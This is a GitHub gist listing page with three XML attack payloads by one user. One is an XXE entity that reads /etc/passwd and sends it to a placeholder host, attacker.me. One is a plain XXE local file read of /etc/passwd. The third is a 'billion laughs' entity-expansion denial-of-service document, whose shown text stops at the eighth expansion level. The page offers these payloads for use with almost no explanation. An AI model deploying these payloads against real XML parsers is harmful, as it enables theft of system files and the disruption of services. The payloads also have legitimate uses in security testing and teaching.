Skip to content

Instantly share code, notes, and snippets.

View N1gh7m4r3-N1dh's full-sized avatar

Nidhish Pandya N1gh7m4r3-N1dh

View GitHub Profile
@N1gh7m4r3-N1dh
N1gh7m4r3-N1dh / payload.xml
Created May 17, 2018 16:51
payload for local file inclusion via xxe refering to an external entity.
<!DOCTYPE lfi [
<!ELEMENT lfi ANY>
<!ENTITY % boo SYSTEM
"file:///etc/passwd">
<!ENTITY xxe SYSTEM "http://attacker.me/?info=%boo">
]>
<lfi>
&boo;
</lfi>
@N1gh7m4r3-N1dh
N1gh7m4r3-N1dh / lfi.xml
Created May 17, 2018 16:28
example payload for local file inclusion via xml external entity attack
<!DOCTYPE lfi [
<!ELEMENT lfi ANY>
<!ENTITY boo SYSTEM
"file:///etc/passwd">
]>
<lfi>
&boo;
</lfi>
@N1gh7m4r3-N1dh
N1gh7m4r3-N1dh / laughs.xml
Last active May 17, 2018 15:32
example xml document of a billion laughs attack.
<?xml version="1.0"?>
<!DOCTYPE kek [
<!ENTITY haha "haha">
<!ENTITY haha2 "&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;&haha;">
<!ENTITY haha3 "&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;&haha2;">
<!ENTITY haha4 "&haha3;&haha3;&haha3;&haha3;&haha3;&haha3;&haha3;&haha3;&haha3;&haha3;">
<!ENTITY haha5 "&haha4;&haha4;&haha4;&haha4;&haha4;&haha4;&haha4;&haha4;&haha4;&haha4;">
<!ENTITY haha6 "&haha5;&haha5;&haha5;&haha5;&haha5;&haha5;&haha5;&haha5;&haha5;&haha5;">
<!ENTITY haha7 "&haha6;&haha6;&haha6;&haha6;&haha6;&haha6;&haha6;&haha6;&haha6;&haha6;">
<!ENTITY haha8 "&haha7;&haha7;&haha7;&haha7;&haha7;&haha7;&haha7;&haha7;&haha7;&haha7;">